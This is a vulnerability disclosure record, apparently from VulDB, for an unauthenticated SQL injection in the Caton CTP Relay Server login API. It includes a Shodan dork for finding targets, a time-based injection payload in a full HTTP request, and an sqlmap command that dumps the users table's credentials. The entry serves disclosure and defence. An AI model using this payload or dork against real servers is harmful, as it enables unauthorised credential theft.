| Название | Caton CTP Relay Server unknown version - SQL Injection Unauthenticated |
|---|
| Описание | # Exploit Title: Caton CTP Relay Server unknown version - SQL Injection Unauthenticated
# Date: 2023-04-21
# Exploit Author: MrEmpy
# Version: unknown
# Shodan Dork: http.favicon.hash:-940032039 title:"Caton CTP Relay Server"
Title:
================
Caton CTP Relay Server unknown version - SQL Injection Unauthenticated
Summary:
================
A SQL Injection vulnerability without authentication has been found in the Caton CTP Relay Server product, in an unknown version. This vulnerability allows an attacker to execute malicious SQL commands against the system's underlying database, which could result in unauthorized disclosure of sensitive information such as user credentials, payment details, and other sensitive data.
The vulnerability was found on the system's login page, at the "/server/api/v1/login" endpoint, where users send their access credentials to log in to the system. The vulnerable parameters are "username" and "password", which are sent via a JSON via POST.
By exploiting this vulnerability, an attacker could insert malicious SQL commands into the "username" and "password" parameters, which will be executed without proper validation. This could allow the attacker to execute malicious commands against the system's database, such as retrieving confidential information or manipulating data.
It is important to note that this vulnerability does not require user authentication, which means that anyone could exploit it without needing to have valid system credentials.
Severity Level:
================
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Affected Product:
================
Caton CTP Relay Server unknown version
Proof of Concept:
================
Request:
POST /server/api/v1/login HTTP/1.1
Host: target
Content-Length: 117
Accept: application/json, text/plain, */*
Accept-Language: en
X-Access-Token:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Content-Type: application/json
Origin: http://target
Referer: http://target/login
Accept-Encoding: gzip, deflate
Connection: close
{"username":"3xpl'XOR(if(now()=sysdate(),sleep(10),0))XOR","password":"3xpl'XOR(if(now()=sysdate(),sleep(10),0))XOR"}
SQLMap command: sqlmap -u 'http://target/server/api/v1/login' --data='{"username":"3xpl","password":"3xpl"}' -p username --risk 3 --level 5 --batch --random-agent --dbms=MySQL --technique=B --threads=10 -D rrsWeb -T users -C username,password --dump |
|---|
| Источник | ⚠️ .. |
|---|
| Пользователь | mrempy (UID 24379) |
|---|
| Представление | 21.04.2023 07:16 (3 лет назад) |
|---|
| Модерация | 04.05.2023 17:56 (13 days later) |
|---|
| Статус | принято |
|---|
| Запись VulDB | 228010 [Caton CTP Relay Server 1.2.9 API /server/api/v1/login username/password SQL-инъекция] |
|---|
| Баллы | 17 |
|---|